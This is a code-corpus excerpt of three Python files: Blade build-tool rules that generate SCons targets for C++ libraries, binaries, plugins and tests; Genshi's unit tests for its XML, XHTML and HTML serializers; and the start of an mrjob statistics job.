rule_args = ('target = "%s" + top_env["OBJSUFFIX"], source = "%s"' %
(target_path, source_path))
if self.data.get('secure'):
rule_args += ', CXX = "$SECURECXX"'
self._write_rule('%s = %s.SharedObject(%s)' % (obj, env_name, rule_args))
if self.data.get('secure'):
self._securecc_object_rules(obj, source_path)
objs.append(obj)
self._write_rule('%s = [%s]' % (objs_name, ','.join(objs)))
self._generate_generated_header_files_depends(objs_name)
if objs:
objs_dirname = self._target_file_path() + '.objs'
self._write_rule('%s.Clean([%s], "%s")' % (env_name, objs_name, objs_dirname))
def _securecc_object_rules(self, obj, src):
"""Touch the source file if needed and generate specific object rules for securecc. """
env_name = self._env_name()
self._write_rule('%s.AlwaysBuild(%s)' % (env_name, obj))
if not os.path.exists(src):
dir = os.path.dirname(src)
if not os.path.isdir(dir):
os.makedirs(dir)
open(src, 'w').close()
class CcLibrary(CcTarget):
"""A cc target subclass.
    This class is derived from CcTarget and it generates the library
rules including dynamic library rules according to user option.
"""
def __init__(self,
name,
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
always_optimize,
prebuilt,
link_all_symbols,
deprecated,
extra_cppflags,
extra_linkflags,
allow_undefined,
secure,
blade,
kwargs):
"""Init method.
Init the cc library.
"""
CcTarget.__init__(self,
name,
'cc_library',
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs)
if prebuilt:
self.type = 'prebuilt_cc_library'
self.srcs = []
self.data['link_all_symbols'] = link_all_symbols
self.data['always_optimize'] = always_optimize
self.data['deprecated'] = deprecated
self.data['allow_undefined'] = allow_undefined
self.data['secure'] = secure
def _rpath_link(self, dynamic):
path = self._prebuilt_cc_library_path(dynamic)[1]
if path.endswith('.so'):
return os.path.dirname(path)
return None
def scons_rules(self):
"""scons_rules.
It outputs the scons rules according to user options.
"""
if self.type == 'prebuilt_cc_library':
self._check_deprecated_deps()
self._prebuilt_cc_library()
elif self.srcs:
self._prepare_to_generate_rule()
self._cc_objects_rules()
self._cc_library()
def cc_library(name,
srcs=[],
deps=[],
visibility=None,
warning='yes',
defs=[],
incs=[],
export_incs=[],
optimize=[],
always_optimize=False,
pre_build=False,
prebuilt=False,
link_all_symbols=False,
deprecated=False,
extra_cppflags=[],
extra_linkflags=[],
allow_undefined=False,
secure=False,
**kwargs):
"""cc_library target. """
target = CcLibrary(name,
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
always_optimize,
prebuilt or pre_build,
link_all_symbols,
deprecated,
extra_cppflags,
extra_linkflags,
allow_undefined,
secure,
blade.blade,
kwargs)
if pre_build:
console.warning("//%s:%s: 'pre_build' has been deprecated, "
"please use 'prebuilt'" % (target.path, target.name))
blade.blade.register_target(target)
build_rules.register_function(cc_library)
class CcBinary(CcTarget):
"""A scons cc target subclass.
    This class is derived from CcTarget and it generates the cc_binary
rules according to user options.
"""
def __init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
extra_cppflags,
extra_linkflags,
export_dynamic,
blade,
kwargs):
"""Init method.
Init the cc binary.
"""
CcTarget.__init__(self,
name,
'cc_binary',
srcs,
deps,
None,
warning,
defs,
incs,
[],
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs)
self.data['embed_version'] = embed_version
self.data['dynamic_link'] = dynamic_link
self.data['export_dynamic'] = export_dynamic
cc_binary_config = configparse.blade_config.get_config('cc_binary_config')
        # Add the extra link libraries listed in the cc_binary config
link_libs = var_to_list(cc_binary_config['extra_libs'])
self._add_hardcode_library(link_libs)
def _allow_duplicate_source(self):
return True
def _get_rpath_links(self):
"""Get rpath_links from dependencies"""
dynamic_link = self.data['dynamic_link']
build_targets = self.blade.get_build_targets()
rpath_links = []
for lib in self.expanded_deps:
if build_targets[lib].type == 'prebuilt_cc_library':
path = build_targets[lib]._rpath_link(dynamic_link)
if path and path not in rpath_links:
rpath_links.append(path)
return rpath_links
def _write_rpath_links(self):
rpath_links = self._get_rpath_links()
if rpath_links:
for rpath_link in rpath_links:
self._write_rule('%s.Append(LINKFLAGS="-Wl,--rpath-link=%s")' %
(self._env_name(), rpath_link))
def _cc_binary(self):
"""_cc_binary rules. """
env_name = self._env_name()
var_name = self._var_name()
platform = self.blade.get_scons_platform()
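        # NOTE: the comparison below is lexicographic on strings, so e.g.
        # '4.10' would sort before '4.5'; acceptable for the gcc 4.x era
        # this code targets.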
if platform.get_gcc_version() > '4.5':
link_flag_list = ['-static-libgcc', '-static-libstdc++']
self._write_rule('%s.Append(LINKFLAGS=%s)' % (env_name, link_flag_list))
(link_all_symbols_lib_list,
lib_str,
whole_link_flags) = self._get_static_deps_lib_list()
if whole_link_flags:
self._write_rule(
'%s.Append(LINKFLAGS=[%s])' % (env_name, whole_link_flags))
if self.data.get('export_dynamic'):
self._write_rule(
'%s.Append(LINKFLAGS="-rdynamic")' % env_name)
self._setup_link_flags()
self._write_rule('%s = %s.Program("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self._add_default_target_var('bin', var_name)
if link_all_symbols_lib_list:
self._write_rule('%s.Depends(%s, [%s])' % (
env_name, var_name, ', '.join(link_all_symbols_lib_list)))
self._write_rpath_links()
if self.data['embed_version']:
self._write_rule('%s.Append(LINKFLAGS=str(version_obj[0]))' % env_name)
self._write_rule('%s.Requires(%s, version_obj)' % (env_name, var_name))
def _dynamic_cc_binary(self):
"""_dynamic_cc_binary. """
env_name = self._env_name()
var_name = self._var_name()
if self.data.get('export_dynamic'):
self._write_rule('%s.Append(LINKFLAGS="-rdynamic")' % env_name)
self._setup_link_flags()
lib_str = self._get_dynamic_deps_lib_list()
self._write_rule('%s = %s.Program("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self._add_default_target_var('bin', var_name)
if self.data['embed_version']:
self._write_rule('%s.Append(LINKFLAGS=str(version_obj[0]))' % env_name)
self._write_rule('%s.Requires(%s, version_obj)' % (env_name, var_name))
self._write_rpath_links()
def scons_rules(self):
"""scons_rules.
It outputs the scons rules according to user options.
"""
self._prepare_to_generate_rule()
self._cc_objects_rules()
if self.data['dynamic_link']:
self._dynamic_cc_binary()
else:
self._cc_binary()
def cc_binary(name,
srcs=[],
deps=[],
warning='yes',
defs=[],
incs=[],
embed_version=True,
optimize=[],
dynamic_link=False,
extra_cppflags=[],
extra_linkflags=[],
export_dynamic=False,
**kwargs):
"""cc_binary target. """
cc_binary_target = CcBinary(name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
extra_cppflags,
extra_linkflags,
export_dynamic,
blade.blade,
kwargs)
blade.blade.register_target(cc_binary_target)
build_rules.register_function(cc_binary)
def cc_benchmark(name, deps=[], **kwargs):
"""cc_benchmark target. """
cc_config = configparse.blade_config.get_config('cc_config')
benchmark_libs = cc_config['benchmark_libs']
benchmark_main_libs = cc_config['benchmark_main_libs']
deps = var_to_list(deps) + benchmark_libs + benchmark_main_libs
cc_binary(name=name, deps=deps, **kwargs)
build_rules.register_function(cc_benchmark)
class CcPlugin(CcTarget):
"""A scons cc target subclass.
    This class is derived from CcTarget and it generates the cc_plugin
rules according to user options.
"""
def __init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
optimize,
prefix,
suffix,
extra_cppflags,
extra_linkflags,
allow_undefined,
blade,
kwargs):
"""Init method.
Init the cc plugin target.
"""
CcTarget.__init__(self,
name,
'cc_plugin',
srcs,
deps,
None,
warning,
defs,
incs,
[],
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs)
self.prefix = prefix
self.suffix = suffix
self.data['allow_undefined'] = allow_undefined
def scons_rules(self):
"""scons_rules.
It outputs the scons rules according to user options.
"""
self._prepare_to_generate_rule()
env_name = self._env_name()
var_name = self._var_name()
self._cc_objects_rules()
self._setup_link_flags()
(link_all_symbols_lib_list,
lib_str,
whole_link_flags) = self._get_static_deps_lib_list()
if whole_link_flags:
self._write_rule(
'%s.Append(LINKFLAGS=[%s])' % (env_name, whole_link_flags))
if self.prefix is not None:
self._write_rule(
'%s.Replace(SHLIBPREFIX="%s")' % (env_name, self.prefix))
if self.suffix is not None:
self._write_rule(
'%s.Replace(SHLIBSUFFIX="%s")' % (env_name, self.suffix))
if not self.data['allow_undefined']:
self._write_rule('%s.Append(LINKFLAGS=["-Xlinker", "--no-undefined"])'
% env_name)
if self.srcs or self.expanded_deps:
self._write_rule('%s = %s.SharedLibrary("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self._add_default_target_var('so', var_name)
if link_all_symbols_lib_list:
self._write_rule('%s.Depends(%s, [%s])' % (
env_name, var_name, ', '.join(link_all_symbols_lib_list)))
def cc_plugin(name,
srcs=[],
deps=[],
warning='yes',
defs=[],
incs=[],
optimize=[],
prefix=None,
suffix=None,
extra_cppflags=[],
extra_linkflags=[],
allow_undefined=True,
**kwargs):
"""cc_plugin target. """
target = CcPlugin(name,
srcs,
deps,
warning,
defs,
incs,
optimize,
prefix,
suffix,
extra_cppflags,
extra_linkflags,
allow_undefined,
blade.blade,
kwargs)
blade.blade.register_target(target)
build_rules.register_function(cc_plugin)
# See http://google-perftools.googlecode.com/svn/trunk/doc/heap_checker.html
HEAP_CHECK_VALUES = set([
'',
'minimal',
'normal',
'strict',
'draconian',
'as-is',
'local',
])
class CcTest(CcBinary):
"""A scons cc target subclass.
    This class is derived from CcBinary and it generates the cc_test
rules according to user options.
"""
def __init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
testdata,
extra_cppflags,
extra_linkflags,
export_dynamic,
always_run,
exclusive,
heap_check,
heap_check_debug,
blade,
kwargs):
"""Init method.
Init the cc test.
"""
cc_test_config = configparse.blade_config.get_config('cc_test_config')
if dynamic_link is None:
dynamic_link = cc_test_config['dynamic_link']
CcBinary.__init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
extra_cppflags,
extra_linkflags,
export_dynamic,
blade,
kwargs)
self.type = 'cc_test'
self.data['testdata'] = var_to_list(testdata)
self.data['always_run'] = always_run
self.data['exclusive'] = exclusive
gtest_lib = var_to_list(cc_test_config['gtest_libs'])
gtest_main_lib = var_to_list(cc_test_config['gtest_main_libs'])
# Hardcode deps rule to thirdparty gtest main lib.
self._add_hardcode_library(gtest_lib)
self._add_hardcode_library(gtest_main_lib)
if heap_check is None:
heap_check = cc_test_config.get('heap_check', '')
else:
if heap_check not in HEAP_CHECK_VALUES:
console.error_exit('//%s:%s: heap_check can only be in %s' % (
self.path, self.name, HEAP_CHECK_VALUES))
perftools_lib = var_to_list(cc_test_config['gperftools_libs'])
perftools_debug_lib = var_to_list(cc_test_config['gperftools_debug_libs'])
if heap_check:
self.data['heap_check'] = heap_check
if heap_check_debug:
perftools_lib_list = perftools_debug_lib
else:
perftools_lib_list = perftools_lib
self._add_hardcode_library(perftools_lib_list)
def cc_test(name,
srcs=[],
deps=[],
warning='yes',
defs=[],
incs=[],
embed_version=False,
optimize=[],
dynamic_link=None,
testdata=[],
extra_cppflags=[],
extra_linkflags=[],
export_dynamic=False,
always_run=False,
exclusive=False,
heap_check=None,
heap_check_debug=False,
**kwargs):
"""cc_test target. """
cc_test_target = CcTest(name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
testdata,
extra_cppflags,
extra_linkflags,
export_dynamic,
always_run,
exclusive,
heap_check,
heap_check_debug,
blade.blade,
kwargs)
blade.blade.register_target(cc_test_target)
build_rules.register_function(cc_test)
| project-zerus/blade | src/blade/cc_targets.py | Python | bsd-3-clause | 39,092 |
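For context, a hedged sketch of how the rules registered above are written in
a BUILD file; the target names, paths and the dependency are invented for
illustration:

cc_library(
    name = 'base',
    srcs = ['base.cpp'],
    deps = ['//thirdparty/glog:glog'],  # hypothetical dependency
    warning = 'yes',
    optimize = ['O2'],
)

cc_binary(
    name = 'server',
    srcs = ['main.cpp'],
    deps = [':base'],
    dynamic_link = False,
)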
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2008 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://genshi.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://genshi.edgewall.org/log/.
import doctest
import unittest
import sys
from genshi.core import Attrs, Stream, QName
from genshi.input import HTML, XML
from genshi.output import DocType, XMLSerializer, XHTMLSerializer, \
HTMLSerializer, EmptyTagFilter
class XMLSerializerTestCase(unittest.TestCase):
def test_with_xml_decl(self):
stream = Stream([(Stream.XML_DECL, ('1.0', None, -1), (None, -1, -1))])
output = stream.render(XMLSerializer, doctype='xhtml', encoding=None)
self.assertEqual('<?xml version="1.0"?>\n'
'<!DOCTYPE html PUBLIC '
'"-//W3C//DTD XHTML 1.0 Strict//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n',
output)
def test_doctype_in_stream(self):
stream = Stream([(Stream.DOCTYPE, DocType.HTML_STRICT, (None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_doctype_in_stream_no_sysid(self):
stream = Stream([(Stream.DOCTYPE,
('html', '-//W3C//DTD HTML 4.01//EN', None),
(None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">\n',
output)
def test_doctype_in_stream_no_pubid(self):
stream = Stream([
(Stream.DOCTYPE,
('html', None, 'http://www.w3.org/TR/html4/strict.dtd'),
(None, -1, -1))
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html SYSTEM '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_doctype_in_stream_no_pubid_or_sysid(self):
stream = Stream([(Stream.DOCTYPE, ('html', None, None),
(None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html>\n', output)
def test_serializer_doctype(self):
stream = Stream([])
output = stream.render(XMLSerializer, doctype=DocType.HTML_STRICT,
encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_doctype_one_and_only(self):
stream = Stream([
(Stream.DOCTYPE, ('html', None, None), (None, -1, -1))
])
output = stream.render(XMLSerializer, doctype=DocType.HTML_STRICT,
encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_comment(self):
stream = Stream([(Stream.COMMENT, 'foo bar', (None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!--foo bar-->', output)
def test_processing_instruction(self):
stream = Stream([(Stream.PI, ('python', 'x = 2'), (None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<?python x = 2?>', output)
def test_nested_default_namespaces(self):
stream = Stream([
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('http://example.org/}div'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1))
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<div xmlns="http://example.org/">
<p/>
<p/>
</div>""", output)
def test_nested_bound_namespaces(self):
stream = Stream([
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('http://example.org/}div'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1))
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<x:div xmlns:x="http://example.org/">
<x:p/>
<x:p/>
</x:div>""", output)
def test_multiple_default_namespaces(self):
stream = Stream([
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<div>
<p xmlns="http://example.org/"/>
<p xmlns="http://example.org/"/>
</div>""", output)
def test_multiple_bound_namespaces(self):
stream = Stream([
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<div>
<x:p xmlns:x="http://example.org/"/>
<x:p xmlns:x="http://example.org/"/>
</div>""", output)
def test_atom_with_xhtml(self):
text = """<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
<id>urn:uuid:c60843aa-0da8-4fa6-bbe5-98007bc6774e</id>
<updated>2007-01-28T11:36:02.807108-06:00</updated>
<title type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">Example</div>
</title>
<subtitle type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">Bla bla bla</div>
</subtitle>
<icon/>
</feed>"""
output = XML(text).render(XMLSerializer, encoding=None)
self.assertEqual(text, output)
class XHTMLSerializerTestCase(unittest.TestCase):
def test_xml_decl_dropped(self):
stream = Stream([(Stream.XML_DECL, ('1.0', None, -1), (None, -1, -1))])
output = stream.render(XHTMLSerializer, doctype='xhtml', encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD XHTML 1.0 Strict//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n',
output)
def test_xml_decl_included(self):
stream = Stream([(Stream.XML_DECL, ('1.0', None, -1), (None, -1, -1))])
output = stream.render(XHTMLSerializer, doctype='xhtml',
drop_xml_decl=False, encoding=None)
self.assertEqual('<?xml version="1.0"?>\n'
'<!DOCTYPE html PUBLIC '
'"-//W3C//DTD XHTML 1.0 Strict//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n',
output)
def test_xml_lang(self):
text = '<p xml:lang="en">English text</p>'
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual('<p lang="en" xml:lang="en">English text</p>', output)
def test_xml_lang_nodup(self):
text = '<p xml:lang="en" lang="en">English text</p>'
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual('<p xml:lang="en" lang="en">English text</p>', output)
def test_textarea_whitespace(self):
content = '\nHey there. \n\n I am indented.\n'
stream = XML('<textarea name="foo">%s</textarea>' % content)
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual('<textarea name="foo">%s</textarea>' % content, output)
def test_pre_whitespace(self):
content = '\nHey <em>there</em>. \n\n I am indented.\n'
stream = XML('<pre>%s</pre>' % content)
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual('<pre>%s</pre>' % content, output)
def test_xml_space(self):
text = '<foo xml:space="preserve"> Do not mess \n\n with me </foo>'
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual('<foo> Do not mess \n\n with me </foo>', output)
def test_empty_script(self):
text = """<html xmlns="http://www.w3.org/1999/xhtml">
<script src="foo.js" />
</html>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual("""<html xmlns="http://www.w3.org/1999/xhtml">
<script src="foo.js"></script>
</html>""", output)
def test_script_escaping(self):
text = """<script>/*<![CDATA[*/
if (1 < 2) { alert("Doh"); }
/*]]>*/</script>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_script_escaping_with_namespace(self):
text = """<script xmlns="http://www.w3.org/1999/xhtml">/*<![CDATA[*/
if (1 < 2) { alert("Doh"); }
/*]]>*/</script>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_style_escaping(self):
text = """<style>/*<![CDATA[*/
html > body { display: none; }
/*]]>*/</style>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_style_escaping_with_namespace(self):
text = """<style xmlns="http://www.w3.org/1999/xhtml">/*<![CDATA[*/
html > body { display: none; }
/*]]>*/</style>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_embedded_svg(self):
text = """<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg">
<body>
<button>
<svg:svg width="600px" height="400px">
<svg:polygon id="triangle" points="50,50 50,300 300,300"></svg:polygon>
</svg:svg>
</button>
</body>
</html>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_xhtml_namespace_prefix(self):
text = """<div xmlns="http://www.w3.org/1999/xhtml">
<strong>Hello</strong>
</div>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_nested_default_namespaces(self):
stream = Stream([
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1))
])
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual("""<div xmlns="http://example.org/">
<p></p>
<p></p>
</div>""", output)
def test_nested_bound_namespaces(self):
stream = Stream([
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1))
])
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual("""<div xmlns:x="http://example.org/">
<p></p>
<p></p>
</div>""", output)
def test_html5_doctype(self):
stream = HTML(u'<html></html>')
output = stream.render(XHTMLSerializer, doctype=DocType.HTML5,
encoding=None)
self.assertEqual('<!DOCTYPE html>\n<html></html>', output)
class HTMLSerializerTestCase(unittest.TestCase):
def test_xml_lang(self):
text = '<p xml:lang="en">English text</p>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<p lang="en">English text</p>', output)
def test_xml_lang_nodup(self):
text = '<p lang="en" xml:lang="en">English text</p>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<p lang="en">English text</p>', output)
def test_textarea_whitespace(self):
content = '\nHey there. \n\n I am indented.\n'
stream = XML('<textarea name="foo">%s</textarea>' % content)
output = stream.render(HTMLSerializer, encoding=None)
self.assertEqual('<textarea name="foo">%s</textarea>' % content, output)
def test_pre_whitespace(self):
content = '\nHey <em>there</em>. \n\n I am indented.\n'
stream = XML('<pre>%s</pre>' % content)
output = stream.render(HTMLSerializer, encoding=None)
self.assertEqual('<pre>%s</pre>' % content, output)
def test_xml_space(self):
text = '<foo xml:space="preserve"> Do not mess \n\n with me </foo>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<foo> Do not mess \n\n with me </foo>', output)
def test_empty_script(self):
text = '<script src="foo.js" />'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<script src="foo.js"></script>', output)
def test_script_escaping(self):
text = '<script>if (1 < 2) { alert("Doh"); }</script>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<script>if (1 < 2) { alert("Doh"); }</script>',
output)
def test_script_escaping_with_namespace(self):
text = """<script xmlns="http://www.w3.org/1999/xhtml">
if (1 < 2) { alert("Doh"); }
</script>"""
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual("""<script>
if (1 < 2) { alert("Doh"); }
</script>""", output)
def test_style_escaping(self):
text = '<style>html > body { display: none; }</style>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<style>html > body { display: none; }</style>',
output)
def test_style_escaping_with_namespace(self):
text = """<style xmlns="http://www.w3.org/1999/xhtml">
html > body { display: none; }
</style>"""
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual("""<style>
html > body { display: none; }
</style>""", output)
def test_html5_doctype(self):
stream = HTML(u'<html></html>')
output = stream.render(HTMLSerializer, doctype=DocType.HTML5,
encoding=None)
self.assertEqual('<!DOCTYPE html>\n<html></html>', output)
class EmptyTagFilterTestCase(unittest.TestCase):
def test_empty(self):
stream = XML('<elem></elem>') | EmptyTagFilter()
self.assertEqual([EmptyTagFilter.EMPTY], [ev[0] for ev in stream])
def test_text_content(self):
stream = XML('<elem>foo</elem>') | EmptyTagFilter()
self.assertEqual([Stream.START, Stream.TEXT, Stream.END],
[ev[0] for ev in stream])
def test_elem_content(self):
stream = XML('<elem><sub /><sub /></elem>') | EmptyTagFilter()
self.assertEqual([Stream.START, EmptyTagFilter.EMPTY,
EmptyTagFilter.EMPTY, Stream.END],
[ev[0] for ev in stream])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(XMLSerializerTestCase, 'test'))
suite.addTest(unittest.makeSuite(XHTMLSerializerTestCase, 'test'))
suite.addTest(unittest.makeSuite(HTMLSerializerTestCase, 'test'))
suite.addTest(unittest.makeSuite(EmptyTagFilterTestCase, 'test'))
suite.addTest(doctest.DocTestSuite(XMLSerializer.__module__))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| dag/genshi | genshi/tests/output.py | Python | bsd-3-clause | 21,084 |
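A small standalone demo of the serializer difference the cases above exercise;
the expected strings are my reading of the serializers, not lines taken from
the suite:

from genshi.input import XML
from genshi.output import XMLSerializer, HTMLSerializer

stream = XML('<br />')
# XML output keeps the empty-element form; HTML output drops the slash.
assert stream.render(XMLSerializer, encoding=None) == '<br/>'
assert stream.render(HTMLSerializer, encoding=None) == '<br>'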
from mrjob.job import MRJob
from itertools import combinations
class MRStatistics(MRJob):
def mapper(self, key, line):
account_id, user_id, purchased, session_start_time, session_end_time = line.split()
purchased = int(purchased)
session_duration = int(session_end_time) - int(session_start_time)
